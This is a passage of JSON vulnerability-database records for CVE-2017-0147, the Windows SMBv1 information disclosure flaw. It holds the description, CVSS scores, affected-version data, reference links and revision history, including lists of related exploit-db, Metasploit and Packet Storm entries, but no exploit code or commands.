"http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}, {"id": "CVE-2017-0147", "bulletinFamily": "NVD", "title": "CVE-2017-0147", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "published": "2017-03-17T00:59:00", "modified": "2018-06-21T01:29:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "reporter": 
"secure@microsoft.com", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0147"], "type": "cve", "lastseen": "2021-04-23T00:07:42", "history": [{"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, 
"impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-05T13:14:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, 
{"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 4.6, "vector": "NONE"}}, "hash": "8bda709d82acdf4b6cbe850e442b4253f5914a04209ae65f2bfc4d9e6d4176ef", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "bf1f670b69a274ab442a5372b2d4378c", "key": "references"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 77}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, 
"severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": 
["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 4.6, "vector": "NONE"}}, "hash": "d864804ce4e34f2a5feb0e863a5f8e0e5605f6fc4eda1878d4483a36c23f1041", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": 
"1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bf1f670b69a274ab442a5372b2d4378c", "key": "references"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 77}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": 
["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, 
{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 4.6, "vector": "NONE"}}, "hash": "8d814749703ee667e166082bd64cbf92f356b404043e09a79622f5a3ade19ac4", "hashmap": [{"hash": "ab861885dbe02d09a3a2208dd9731d62", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "750b16738b000f87940d09b1ba668640", "key": "references"}, {"hash": "304c200bf4a637f269c9acaf5f79c209", "key": "description"}, {"hash": 
"a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "54741b582bd860909f9fa2ec54e49c77", "key": "cvss2"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "0e53d0deb991b66bb6a7a414e375241c", "key": "href"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "6425b40b29b1f10d6066f4a71bb91df7", "key": "cvss3"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "876f47c4ebc2b9e0dd17afaa22819f2a", "key": "cvss"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "b647a850fd42b235dd11ee60cf626f2d", "key": "cwe"}, {"hash": "86a69a73afce6263b58d42af8e129794", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0147", "id": "CVE-2017-0147", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147", "http://www.securitytracker.com/id/1037991", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://www.securityfocus.com/bid/96709", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0147", "type": "cve", "viewCount": 51}, "differentElements": ["references"], "edition": 2, "lastseen": "2019-10-04T12:18:44"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, 
{"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0147"], "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, "cwe": ["CWE-200"], "description": "The SMBv1 server in Microsoft 
Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to obtain sensitive information from process memory via a crafted packets, aka \"Windows SMB Information Disclosure Vulnerability.\"", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"], "type": "trendmicroblog"}, {"idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B"], "type": "attackerkb"}, {"idList": ["SMNTC-96709"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 